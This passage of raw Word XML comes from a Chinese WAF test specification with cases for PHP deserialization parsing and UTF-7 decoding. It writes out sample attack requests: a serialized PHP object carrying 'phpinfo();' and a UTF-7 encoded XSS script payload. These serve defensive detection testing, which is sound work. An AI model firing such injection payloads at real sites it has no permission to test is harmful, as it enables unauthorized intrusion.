              <w:t>成功解析攻击请求，拦截攻击流量并记录日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164403" name="Picture 385164403"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="xml_event_ebac878b164b447fa1ca08552774a085_basic_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId51"/>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404" name="Picture 385164404"/>
                  <wp:cNvGraphicFramePr>
                    <a:graphicFrameLocks noChangeAspect="1"/>
                  </wp:cNvGraphicFramePr>
                  <a:graphic>
                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                      <pic:pic>
                        <pic:nvPicPr>
                          <pic:cNvPr id="0" name="xml_event_ebac878b164b447fa1ca08552774a085_detail_20260515_134316.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId52"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4114800" cy="2314575"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect"/>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="32BED998">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E0B4E37">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="32C460B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D2706B8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5EAE6DE4">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="64BA9D37">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="662E3B91">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16B01BCB">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D39C816">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="420"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CBDEEF4">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc21077813"/>
      <w:bookmarkStart w:id="111" w:name="_Toc81916116"/>
      <w:bookmarkStart w:id="112" w:name="_Toc1210118880"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>PHP反序列化对象解析</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
      <w:bookmarkEnd w:id="111"/>
      <w:bookmarkEnd w:id="11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33022276">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="6D84BCE3">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="184F3DCA">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PHP反序列化对象解析</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="52624698">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="73F0C58E">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="76D7DDBB">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构</w:t>
            </w:r>
            <w:bookmarkStart w:id="113" w:name="OLE_LINK28"/>
            <w:bookmarkStart w:id="114" w:name="OLE_LINK27"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>造</w:t>
            </w:r>
            <w:bookmarkEnd w:id="113"/>
            <w:bookmarkEnd w:id="114"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>PHP反序列化请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="1210E3F7">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1F3B1235">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="38363EB1">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="140FD210">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DFA6769">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构告PHP反序列化请求：h</w:t>
            </w:r>
            <w:r>
              <w:t>ttp://www.site.com/</w:t>
            </w:r>
            <w:bookmarkStart w:id="115" w:name="OLE_LINK5"/>
            <w:bookmarkStart w:id="116" w:name="OLE_LINK6"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>index</w:t>
            </w:r>
            <w:r>
              <w:t>.php?answer= O:7:"chybeta":1:{s:4:"test";O:7:"ph0en2x":1:{s:5:"test2";s:10:"phpinfo();";}}</w:t>
            </w:r>
            <w:bookmarkEnd w:id="115"/>
            <w:bookmarkEnd w:id="116"/>
          </w:p>
          <w:p w14:paraId="4A5DF871">
            <w:pPr>
              <w:pStyle w:val="89"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="25"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被记录，查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解码为编码之前的状态。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="7358985D">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="2D063733">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="62806968">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功解析攻击请求，记录日志。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="62F904D8">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="28DA22F8">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>判定结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="537C4F3F">
            <w:pPr>
              <w:pStyle w:val="154"/>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492464F">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="063BADF6">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试人员</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2835" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A8D6187">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1701" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5CE3437F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体"/>
                <w:b/>
              </w:rPr>
              <w:t>日期</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2907" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15A1359B">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5AA03E15">
      <w:pPr>
        <w:spacing w:after="163"/>
        <w:ind w:firstLine="0" w:firstLineChars="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="507A8F5C">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:bookmarkStart w:id="117" w:name="_Toc81916117"/>
      <w:bookmarkStart w:id="118" w:name="_Toc21077814"/>
      <w:bookmarkStart w:id="119" w:name="_Toc1797879070"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UTF</w:t>
      </w:r>
      <w:r>
        <w:t>-7</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解码</w:t>
      </w:r>
      <w:bookmarkEnd w:id="117"/>
      <w:bookmarkEnd w:id="118"/>
      <w:bookmarkEnd w:id="11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618F1B5">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="08DA8D33">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="436789A9">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UTF-7解码</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="0249853A">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="35FD9A60">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>测试项目描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="5D1824D2">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>构造UTF-7编码后的请求发送至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>应成功解码并产生攻击告警。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="2B45567C">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="5988BBFD">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>执行步骤</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="6DA0C269">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>添加防护站点，绑定至后端真实s</w:t>
            </w:r>
            <w:r>
              <w:t>erver</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4B4F1D65">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>将W</w:t>
            </w:r>
            <w:r>
              <w:t>EB</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>流量牵引至W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检测节点；</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="35279112">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>对攻击p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>进行编码（编码时可使用h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w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49F53029">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:wordWrap w:val="0"/>
              <w:spacing w:after="163"/>
              <w:ind w:left="357" w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:t>http://www.site.com/</w:t>
            </w:r>
            <w:bookmarkStart w:id="120" w:name="OLE_LINK8"/>
            <w:bookmarkStart w:id="121" w:name="OLE_LINK7"/>
            <w:r>
              <w:t>index.php?aswer=%2B%2Fv8%20%2BADw-SCRIPT%2BAD4-alert(%27XSS%27)%3B%2BADw-%2FSCRIPT%2BAD4-</w:t>
            </w:r>
            <w:bookmarkEnd w:id="120"/>
            <w:bookmarkEnd w:id="121"/>
          </w:p>
          <w:p w14:paraId="5E457FD1">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="26"/>
              </w:numPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>观察请求是否被拦截，查看W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否记录攻击日志并观察p</w:t>
            </w:r>
            <w:r>
              <w:t>ayload</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>是否被解码为编码之前的状态。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w14:paraId="43512A50">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1769" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F1F1" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1E13998F">
            <w:pPr>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:rFonts w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia" w:cs="宋体"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>预期结果</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7443" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
          </w:tcPr>
          <w:p w14:paraId="70F6B380">
            <w:pPr>
              <w:pStyle w:val="154"/>
              <w:spacing w:after="163"/>
              <w:ind w:firstLine="420"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>W</w:t>
            </w:r>
            <w:r>
              <w:t>AF</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>成功识别编码的攻击请求，拦截并记录日志。</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:drawing>
                <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                  <wp:extent cx="4114800" cy="2314575"/>
                  <wp:docPr id="385164405" name="Picture 385164405"/>
